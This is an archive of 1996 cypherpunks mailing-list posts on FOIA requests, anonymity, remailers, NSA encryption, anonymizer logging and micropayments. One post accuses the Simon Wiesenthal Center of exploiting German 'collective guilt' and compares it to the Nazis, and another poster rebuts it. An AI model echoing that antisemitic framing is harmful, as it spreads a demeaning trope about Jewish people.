Message-ID: <199601141620.LAA62254@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I agree with Charlie Merritt and Declan that a well-placed FOIA
request would be a good thing (tm). I am less interested in the
identities of low-level Customs, etc. employees than I am in what
orders were given, and which political appointees gave them. This
action is an entirely reasonable one to take with regard to *our*
employees. As a FOIA request can get a bit expensive, I'd suggest
that those of us who are interested try to pool our efforts/$ as
we did with the ZLDF. This method seems to have worked, :) and
ecash should make it easy...
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMPksuW1lp8bpvW01AQGzwwP+I0tKtaE22BjLbFaTNGePqjiFHwHUs3To
s43nxKb8jroaCcvVM+5S5g9kl21/nTAqzPRQhk+7jntiQaCduNj7lRJ1dQiYRDgH
pFq68ybG1J61zFLaYmbuiMFOjNZD1L6ZemZcd3RFXh7nx4bcnOy1piX5BH1lZTtr
iXGNoHO+Xpo=
=j5DH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 14 Jan 96 11:45:48 PST
To: cypherpunks@toad.com
Subject: [NOISE] Re: COMMUNITY CONNEXION...
In-Reply-To: <199601141734.SAA23618@utopia.hacktic.nl>
Message-ID: <199601141945.LAA11478@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Sounds like you're a little weak on your history, Attila. Not that I
> agree with the SWC's policies one bit, but some basic dates and facts -
> when SW was born, when he founded his C, when WW2 was, what the Nazis did
> during it and what the SWC has done since, when and how the anti-Nazi and
> hate speech laws were passed in Germany, whether "any" speech or revision
> against the SWC's agenda (or do you just mean "JEWS"?), etc - would make
> pretty short work of your nonsense.

Congratulations.  You win the award for this weeks longest run-on
sentence. 

Is there some special reason you had to post this little history
lesson anonymously?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graeme Cross <graeme@chem2.chem.swin.edu.au>
Date: Sat, 13 Jan 96 18:18:48 PST
To: cypherpunks@toad.com
Subject: Re: New! Improved! CryptoLib 1.1 now available.
In-Reply-To: <199601131608.AA031019338@idea.sec.dsi.unimi.it>
Message-ID: <Pine.SGI.3.90.960114131345.9362A-100000@chem2.chem.swin.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 13 Jan 1996, David Vincenzetti wrote:

> > Announcing CryptoLib - Release 1.1              12/21/95
> >    Jack Lacy, AT&T Bell Labs
> > 
> > CryptoLib is a portable and efficient library of primitives
> > for building cryptographic applications.  It runs under most versions
> > of Unix as well as DOS, Windows and Windows-NT (and 95).
> >
> > We are pleased to make CryptoLib source code available without charge
> > to researchers and developers in the US and Canada.  (Because of export
> > restrictions on cryptographic software, we are only able to make the
> > software available within the US and Canada to US and Canadian citizens
> > and US permanent residents.)
> 
> also available in Europe as:
> 
> 	ftp://ftp.dsi.unimi.it/pub/security/crypt/math/cryptolib_1.1.tar.gz
> 
> Ciao,
> David
> 

Australasian cypherpunks can also grab it from:

	ftp://chem2.chem.swin.edu.au/pub/security/cryptolib_1.1.tar.gz

Cheers
Graeme

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graeme Cross         Phone: (61 +3) 9214 8185  
                    E-mail: graeme@chem2.chem.swin.edu.au
                   PGP key: http://www.chem.swin.edu.au/~graeme/key.html




-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQB1AgUBMPhnRGAiycRwLbVJAQEE0AMAjF8rmvMqWTe9RMtsUi/pLBmJUMwmB+VR
G17+r7XXq2cDwyRzhIkWkm6WImBNzo+jc5gdpepnpHfwpII1BxyQqxi159mJUxIp
p6HwlKkHwx/WTo3Fe66QByL1kU1bli9m
=o4Ra
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmerritt@intellinet.com (Charlie Merritt)
Date: Sun, 14 Jan 96 11:27:01 PST
To: cypherpunks@toad.com
Subject: Re: A pooled e-cash FOIA request
Message-ID: <199601141930.NAA14451@intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray said in part:
>a well-placed FOIA
>request would be a good thing (tm). I am less interested in the
>identities of low-level Customs, etc. employees than I am in what
>orders were given, and which political appointees gave them.

>As a FOIA request can get a bit expensive, I'd suggest
>that those of us who are interested try to pool our efforts/$ as
>we did with the ZLDF. This method seems to have worked, :) and
>ecash should make it easy...

I'm ready.  I'm willing to put in some bucks.
We need a lawyer, a [virtual] center.
I think the easiest part to get would be a financial accounting
(partial I bet).  I'm sure the DOJ has a (cya) policy of never 
identifing goons of a failed persecution.

It has been suggested to me that individual law suits against the
the low level people that CAN be identified might be an approach.
Sue for violation of constitutional rights.
The depositions would work like a grand jury invrestigation.
"Well, Agent Smith, if you were just following orders
WHO gave them to you?"  Sue your way up the line.
Lotsa Ebucks :-(





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 14 Jan 96 13:25:30 PST
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [NOISE] Re: COMMUNITY CONNEXION...
In-Reply-To: <199601141945.LAA11478@netcom2.netcom.com>
Message-ID: <199601142126.PAA08538@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> > Sounds like you're a little weak on your history, Attila. Not that I
> > agree with the SWC's policies one bit, but some basic dates and facts -
> > when SW was born, when he founded his C, when WW2 was, what the Nazis did
> > during it and what the SWC has done since, when and how the anti-Nazi and
> > hate speech laws were passed in Germany, whether "any" speech or revision
> > against the SWC's agenda (or do you just mean "JEWS"?), etc - would make
> > pretty short work of your nonsense.

[...]

> Is there some special reason you had to post this little history
> lesson anonymously?

Aha, at last some cypherpunk relevance. Would the post have been ok if it
had been signed? 

Anonymity isn't the issue, content is.  No one needs a reason or special
justification for anonymity -- we're entitled to it.  But we're also 
entitled to ignore people we don't want to communicate with, including 
anonymous people.

This is Eric's list, and he's entitled to make a rule that anonymous posts
aren't allowed, but he hasn't done so -- anonymous posts are ok.  If we
don't like Eric's rules, we're entitled to set up another list with
different rules on another server and post there.  And of course if you
don't like anonymous posts, you're entitled to skip them. 

Banning anonymity doesn't give you any protection at all from off topic
posts.  Check the archives if you don't believe me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 14 Jan 96 08:15:13 PST
To: sameer <sameer@c2.org>
Subject: Re: COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES
In-Reply-To: <199601110938.BAA10567@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.960114160534.1999B-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	an excellent statement, sameer. many of our population around the 
    world will voice these sentiments, but how many will care to implement
    in the face of an onslaught by pressure groups, government, self-
    serving news services, etc?

	c2 provides a service that states exactly what it means --and then
    implements it.  kudos due all the way around.

	the SWC is a prime example of very narrow view which is trying to 
    "control" what we can say --unfortunately, SWC is guilty of the same
    mind-control tactics as the core Nazi party which persecuted them  ==
    a very poor example.  In Germany, trading on collective guilt they 
    will never stop feeding, they have effectively controlled the issue
    so that _any_ speech or revision against their agenda is a hate crime,
    and therefore a serious felony. 

	thank you for standing up to the Simon Weisenthal Center!

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 14 Jan 96 13:37:18 PST
To: Charlie Merritt <cmerritt@intellinet.com>
Subject: Re: A pooled e-cash FOIA request
In-Reply-To: <199601141930.NAA14451@intellinet.com>
Message-ID: <Pine.SV4.3.91.960114163455.9636A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> It has been suggested to me that individual law suits against the
> the low level people that CAN be identified might be an approach.
> Sue for violation of constitutional rights.
> The depositions would work like a grand jury invrestigation.
> "Well, Agent Smith, if you were just following orders
> WHO gave them to you?"  Sue your way up the line.

    This is the way federal prosecutors work. They put the squeeze on
some people to get them to squeel, or even wear a wire or testify against 
their erstwhile companions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 14 Jan 96 15:13:16 PST
To: attila <attila@primenet.com>
Subject: Re: COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES
Message-ID: <2.2.32.19960114231553.00943bb4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:14 PM 1/14/96 +0000, attila wrote:
>
>	an excellent statement, sameer. many of our population around the 
>    world will voice these sentiments, but how many will care to implement
>    in the face of an onslaught by pressure groups, government, self-
>    serving news services, etc?

Of the 7000+ ISPs on Earth, more than 1000.  More than enough.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Sun, 14 Jan 96 08:28:21 PST
To: cypherpunks@toad.com
Subject: GNN on Crypto
Message-ID: <Pine.SOL.3.91.960114181859.2071A-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



Global Network Navigator Web Review (http://gnn.com/wr/) has their main 
story this week on crypto. The articles are:

Spymaster meets webmaster:NSA's Fortezza: stronger encryption or Internet 
spy strategy
http://gnn.com/gnn/wr/96/01/12/features/nsa/index.html

The Seduction of Crypto AG: How the NSA held the keys to a top-selling 
encryption machine
http://gnn.com/gnn/wr/96/01/12/features/nsa/crypto.html

Familiar faces, familiar places: Look who's working to implement Fortezza in 
the US and Europe 
http://gnn.com/gnn/wr/96/01/12/features/nsa/triteal.html

What's that smell: Is the NSA sniffing your email?
http://gnn.com/gnn/wr/96/01/12/features/nsa/sniff.html

A back door for the NSA: Balancing the need for intelligence with privacy
http://gnn.com/gnn/wr/96/01/12/features/nsa/conclude.html

Juri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 14 Jan 96 09:34:58 PST
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION...
Message-ID: <199601141734.SAA23618@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Attila sez:

>         the SWC is a prime example of very narrow view which is trying to 
>     "control" what we can say --unfortunately, SWC is guilty of the same
>     mind-control tactics as the core Nazi party which persecuted them  ==
>     a very poor example.  In Germany, trading on collective guilt they 
>     will never stop feeding, they have effectively controlled the issue
>     so that _any_ speech or revision against their agenda is a hate crime,
>     and therefore a serious felony. 

   Sounds like you're a little weak on your history, Attila. Not that I
agree with the SWC's policies one bit, but some basic dates and facts -
when SW was born, when he founded his C, when WW2 was, what the Nazis did
during it and what the SWC has done since, when and how the anti-Nazi and
hate speech laws were passed in Germany, whether "any" speech or revision
against the SWC's agenda (or do you just mean "JEWS"?), etc - would make
pretty short work of your nonsense.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@netcom.com (Matthew Ghio)
Date: Sun, 14 Jan 96 19:52:22 PST
To: cypherpunks@toad.com
Subject: anonymizer.cs.cmu.edu
Message-ID: <199601150349.TAA01319@myriad>
MIME-Version: 1.0
Content-Type: text/plain


I tried this site http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl
using Mosaic 2.7b2 and was told:

     Your computer is a X11;Linux 1.2.13 i486. 
     Your Internet browser is NCSA Mosaic. 
     You just visited the Anonymizer Home Page. 

With Arena it gave me:

     Your Internet browser is Arena/0.96s libwww/.

Lynx came up with even less:

     Your computer is a Unix box.
     Your Internet browser is Lynx.


I did manage to completely confuse it with:

> myriad:~> telnet anonymizer.cs.cmu.edu 8080
> Trying 128.2.199.14...
> Connected to LCON.PC.CS.CMU.EDU.
> Escape character is '^]'.
> GET /prog/snoop.pl
> <HTML><HEAD><!-- blah -->
> <TITLE>I  CAN  SEE  YOU</TITLE>
> </HEAD>
> 
> <BODY BGCOLOR="78789F"
>         text="#FFFFFF"
>         vlink="#dbdb70"
>         link="#FFFF00"
>         alink="#1010ff"
>         >
> 
> <center>
>     <img alt="Anonymizer logo" src="ftp://anonymizer.cs.cmu.edu/pub/I19">
> </center>
> 
> <HR>
> 
> Many people surf the web under the illusion that their actions are
>     private and anonymous.  Unfortunately, it isn't so.  Every time
>     you visit a site, you leave a calling card that reveals where
>     you're coming from, what kind of computer you have, and other
>     details.  Most sites keep logs of all your visits.  In many cases,
>     this logging may constitute a violation of your privacy.
> 
>  <P>
> 
>     Here's a sampling of the kind of information that a site can
> collect on you (please wait a moment):
> 
>  <P>
> 
> 
> 
> <BLOCKQUOTE><STRONG>
> 
> 
> <img src="/let/a.gif"><img src="/let/j.gif"><img src="/let/u.gif"><img src="/let/r.gif"><img src="/let/i.gif"><img src="/let/s.gif"><img src="/let/o.gif"><img src="/let/n.gif"><br>
> 
> Your name is probably ajurison, and you can be reached at ajurison@netcom20.netcom.com.
> 
> 
> <BR> Your Internet browser is [unknown browser].

This time it actually took a stab at the user name, and got it completely
wrong, although the hostname (netcom20.netcom.com) was correct.  I suspect
it used finger and took a wild guess.


The rest of the information is obvious from the User-Agent header, though I
find it unusual that the new Mosaic reports the cpu/os type:

 User-Agent:  NCSA_Mosaic/2.7b2 (X11;Linux 1.2.13 i486)  libwww/2.12 modified

Mosaic 2.4 reports only:

 User-Agent:  NCSA Mosaic for the X Window System/2.4 (L10N-2.4.0)  libwww/2.12 modified

Lynx reports:

 User-Agent:  Lynx/2.2  libwww/2.14

The statement "Your computer is a Unix box." seems to be just a likely
guess, but it could be wrong, because there is a version of lynx for MSDOS.


What suprises me is not the information this got, but what it *DIDN'T* get.
It never managed to figure out my username, despite the fact that netcom
runs identd, and all three web browsers give it my username when they opened
the FTP connection.  It only reported the hostname in one instance, and
seems to be ignoring the info from the ftp session.
This "snoop" script isn't getting half the information it could!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sun, 14 Jan 96 22:18:47 PST
To: cypherpunks@toad.com
Subject: DEC's MICROCASH
Message-ID: <Pine.BSD.3.91.960114201707.28537C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  01 14 96 Edupage includes: 
 
  MICROCASH
 
  Digital Equipment filed a patent last August for a payment 
  system called Millicent, which enables Web-site operators 
  to charge as little as a tenth of a cent for each customer 
  "hit." 
 
  The system relies on middle-men --credit card companies or 
  digital banks -- to handle the transactions, but its novelty 
  lies in its cost-effective design geared toward tracking 
  minuscule amounts of cash.  To keep disk storage at a minimum, 
  security measures providing privacy and a trail of signed re- 
  ceipts are not included in the system, but proponents point out 
  that would-be cyberthieves would have to crack a lot of trans- 
  actions -- 10,000 at 0.1 cent each -- to make just $10.  "There 
  are easier ways to make 10 bucks," says Millicent's inventor. 
 
  (Business Week 15 Jan 96 p90) 
 
 
  Cordially, 
 
  Jim 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 14 Jan 96 20:35:45 PST
To: blanc <blancw@accessone.com>
Subject: Re: Net Control is Thought Control
In-Reply-To: <01BADFF7.0DBE4740@blancw.accessone.com>
Message-ID: <199601150435.UAA11531@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>the problem that "covert thought control" becomes more possible with
>an information age that does not handle identity in any "permanent" or
>"enduring" way. agent provocateurs etc. may be more difficult to =
>identify
>and easier to create and maintain.   in fact a single "government
>thought control agent" might be able to create and maintain dozens of
>convincing identities, all of them working to subtly manipulate the
>population's thinking without detection. (...)
>........................................................................=
>...................................
>
>I read the book, too, Nuri, and I think you overlooked an important =
>point.  It doesn't matter about the identity of the provocateur.  It is =
>the identity of the "target" which is crucial.  It is when the prisoner =
>in a psychologically restricted setting begins to identify with their =
>agent-provocateur cell mates, to sympathize with and accept their =
>ideology, that change in that prisoner's mind becomes possible and the =
>thought control is achieved.

I don't understand your point. both the agent provocateur and "victim"
are crucial to the process of brainwashing. they are the yin and yang
of it all, of course, and I am certainly not arguing otherwise. what
I was pointing out was that it is increasingly difficult to identify
people's secret agenda in cyberspace. 

if in the real world, someone
eventually successfully identifies an agent provacateur (or any kind
of criminal for that matter) they are "outed" with their mug shot and
fingerprints or whatever. now, in cyberspace you have no such "leash"
or "handle" on identity. a single person could be a zillion different
agent provocateurs all over cyberspace, but if you out him in one
place, you don't out him anywhere else.

if you find that some pseudonym is actually a government agent, you
have little recourse. you could discredit that single pseudonym, 
but potentially the person behind it has plenty of others to play with.

cypherpunks probably say,
"oh yeah, that's cyberspace's greatest design feature". this 
tends to mask some of their assumptions:

1. you can't commit a crime in cyberspace.
2. so what if someone has a zillion identities all over the place.

I disagree with both of these premises, but of course I'm not going to
get anywhere arguing with anyone that starts with them as given.

you were talking about prisoners identifying with the agent provocateur.
I was trying to draw the analogy to a mailing list scenario where
the people on the list are the "victims" (not "prisoners"). the situation
is the same: the "victims" are in danger if they begin to identify with
the brainwashing agent. the agent of course will show few signs of his
true identity or actual agenda.

>
>This change in the prisoner's image of themselves is not so easily =
>accomplished in a setting where they are free to leave, free to seek and =
>hear other points of view - more importantly, the actual truth.

that's very true, but you must realize how powerful peer groups are. 
a prison is just one kind of peer group. workplace employment, the 
cypherpunks, or really any kind of group *always* has a pecking order
and peer pressure. there are all kinds of opinions on certain subjects
that are wholly relevant to this list that are "taboo" to talk about
on this list if the poster is interested in working his way up the
"perceived reputation pecking order". any place you have a group,
and peer pressure, you have the opportunity to manipulate people.

>	"The primary effect of unfreezing is that it makes the prisoner seek =
>information
>	which will guide him in finding an adaptational solution to his =
>problems.  Such
>	information can be gotten to some extent from the propaganda input to =
>him
>	via the mass media, lectures, loudspeakers, etc., but more likely is =
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>obtained
>	from cell mates or interrogators who begin to be models of how to adapt
>	successfully.

I agree, a prison is the easiest place to brainwash people, but I think
the authors were interested in writing their book precisely because they
recognized the techniques they were describing are reflected in many
"legitimate" social institutions.

  The prisoner who has been unfrozen begins to treat the =
>inter-
>	personal cues he obtains from them as credible and valid, and begins to =
>
>	take their point of view seriously, where previously he may have paid =
>no
>	attention to it or even discounted it. "=20

again, the entire book is prison-specific. I would be very interested
of course in a study dedicated to cyberspace, but lacking that the 
research is the closest analogy. Alcoholics Anonymous is another
example of a group that is not prison oriented but shares all the
brainwashing techniques the authors identify. (I am not saying AA
is a brainwashing organization. neither am I saying they are not.)

>A mistake people make even when they are not physically imprisoned, is =
>that they seek to benefit by association:  they will accept an =
>appearance of confidence as equivalent to knowledge, accepting the word =
>of those who "seem to know", instead of searching for definite facts.  =
>They come to depend upon their identification with groups of such =
>like-minded people, and thus get themselves in trouble when the whole =
>herd is suddenly corralled and taken for a ride (by their leaders).

you are thinking too literally in terms of the research. the techniques
are not at all required to be practiced in a prison. I can give you numerous
examples of the same techniques used in many institutions, groups, and
settings far removed from a prison atmosphere. they are not primarily
religious either.

>Rather than worry so much about anyone's actual identity as a =
>determining factor in what one will accept from them, I think it is much =
>more critical to consider the content of the information they offer; to =
>develop one's judgement (to "know how to know")so to be able to evaluate =
>that information and make realistic decisions for one'self about what to =
>support or what actions to take.
>

classic cypherpunks argument. problematic in the real world. we
have laws that require disclosure of who pays politicians in their campaigns,
yet one could make the argument, "rather than worry about people's identity,
let their money and interests speak for themselves." 

I agree that information
should on one level be judged independently of the source. but there's just
no doubt that the *origin* of the message is *itself* often *very*valuable*
information. that is, the messenger's identity is *part* of the message.
of course, it is not *the* message. this belief leads to things like the 
"genetic fallacy" (proof by discrediting reputation) course.

agent provocateurs and brainwashers will benefit immensely from your 
attitude. they will be the first to emphasize, "why are we so concerned
about people's backgrounds? let people say what they want to say and
judge them on the message". I am not saying we should have a purity test
on the cypherpunks list. I'm simply pointing out that the idea that
identity and communication are not related is preposterous by strong
refutation of the real world.

another possibility is a whole army of false personas creating a 
nonexistent "consensus" by sheer force and magnitude of postings 
in cyberspace.  would you care to deny such a thing is possible? 
there may be active research projects underway this very moment here or 
elsewhere. it would be difficult to establish a control to quantify
efficacy for this kind of experiment, but probably not beyond 
someone with some ingenuity and malice.

the next time you see a flamewar, ask yourself this question: what would
I think if I found out every opinion and post on one side  was manufactured
by a single person? how can you be so sure they aren't?

there is absolutely no doubt that humans are very strongly influenced
by *who* is behind a message. it is one of the elements they use to
judge reasonableness of a message when there are not other obvious factors
to judge the message (such as: it is about the future, it is about what
people "should" do, etc.). to deny this is to deny basic human nature.

consensus, and perception of consensus, are two different animals, and
the agent provocateur understands the subtle distinction and *exploits*
it in his favor.

I don't expect anyone to understand these points. such a contrarian
position (here anyway) will likely be flamed. no surprise there.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@wero.cs.byu.edu>
Date: Sun, 14 Jan 96 22:14:17 PST
To: cypherpunks@toad.com
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <30F8596B.5611@netscape.com>
Message-ID: <199601150454.VAA00449@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I've removed the code that uses the e-mail address as the
> FTP password for anonymous FTPs.

Does that mean that general-purpose ftp won't be accepted unless the
user gives up their email? Greaaaaaaat... Can't have it both ways, I
guess. What can be added as far as user control; inline vs non-inline,
for example.

The FTP explanation certainly explains why my personal system is able
to confuse the username part of it. And I know there's nothing anyone
can do about the reverse-ip, but what about http referral field? Will
there be a way to turn off (blank, actually) this field?

Jeff, your efforts are certainly appreciated - your ability to get these
things done is most valuable.


Regarding the anonymizer:
First, are there any working anonymizers yet?
Second, is there any ISP that would be willing to give a home to the
  anonymizer?

Don
- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPneFsLa+QKZS485AQFq6gMAqAfHurwzZe9KTvmfWsg40iGubTHjlB2m
okvm6aHMjfOGRdHcSwD3sfSuuZ2suWS875qFDV06ITgbrWXJK3sb7lO9WPnU+0Of
8NFmEDZQNbQ8cqcio/NiT6PURp3NBc1+
=xQVe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 14 Jan 96 20:39:30 PST
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: Bignum support added to XLISP 2.1h
In-Reply-To: <v02130502ad193fbd1b75@[199.125.128.5]>
Message-ID: <9601150438.AA22146@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 10 Jan 1996 11:26:49 -0500
    From: Peter Wayner <pcw@access.digex.net>
    
    Many cypherpunks might enjoy programming in XLISP 2.1h because the freely
    available implementation of LISP now offers support for BIGNUMS. That means
    it is quite easy to write cryptographic algorithms that use very large
    numbers without adding extra support. The downside is that the language is
    interpretted and thus much slower than something like C.

This is good to hear.  However it's also worth noting that a number of
other freely available lisps, e.g. CLISP, gcl (previously kcl and
akcl) and CMU Common Lisp, also support bignums.  CMU Common Lisp has
the disadvantage of not being as portable as the others, but has the
advantage of compiling to native code on supported architectures which
include Sparc, Pmax, and HP.
    
    It should also be possible to write RSA in a very short XLISP program. I
    don't know if you can do 4 lines, but it should be quite short.

Yup.  I've written some code that generates large numbers, tests for
primality and does RSA.  The basic RSA enclode is just (mod-expt m e
n) and decrypt is (mod-expt c d n) where mod-expt is just an optimized
version of (mod (expt x p) n), ala Schneier, page 200 (1st edition).
Even with CLISP (compiles to a byte code which is then interpreted),
I've generated RSA keys in the range that PGP deals with.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 15 Jan 96 06:56:27 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199601151455.GAA11739@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: all of the "ek" tags have been verified correct. Apologies to
those who were inconvenienced by incorrect "ek" tags in the past.

Last update: Mon 15 Jan 96 6:48:07 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
bsu-cs   nowhere@bsu-cs.bsu.edu           ++#+*##*---*    20:42 100.00%
c2       remail@c2.org                    *-+*********    17:00  99.99%
replay   remailer@replay.com              ***+********     5:47  99.99%
ecafe    cpunk@remail.ecafe.org           *###########  2:12:32  99.99%
flame    remailer@flame.alias.net         ++++++++++++    52:25  99.99%
mix      mixmaster@remail.obscura.com     -----------   2:12:08  99.96%
ford     remailer@bi-node.zerberus.de     .--.-.-*++++  4:17:19  99.95%
pamphlet pamphlet@idiom.com               ++++++++++++    44:27  99.93%
vishnu   mixmaster@vishnu.alias.net       ++*+********    22:18  99.89%
hacktic  remailer@utopia.hacktic.nl       ***+********     8:14  99.88%
alumni   hal@alumni.caltech.edu           +*+**--*+***    12:30  99.88%
portal   hfinney@shell.portal.com         #####*##*+++    10:33  99.85%
penet    anon@anon.penet.fi               -----------  10:09:06  99.83%
rmadillo remailer@armadillo.com           ###### ##+#*     2:00  99.71%
tjava    remailer@tjava.com               +########+#     59:00  99.54%
spook    remailer@valhalla.phoenix.net    --.-* * -  *  1:54:34  94.25%
extropia remail@extropia.wimsey.com       -   -.-----   6:01:55  93.81%
hroller  hroller@c2.org                   #-#####-#  #     3:50  90.56%
rahul    homer@rahul.net                  #####+** ###      :57  99.49%
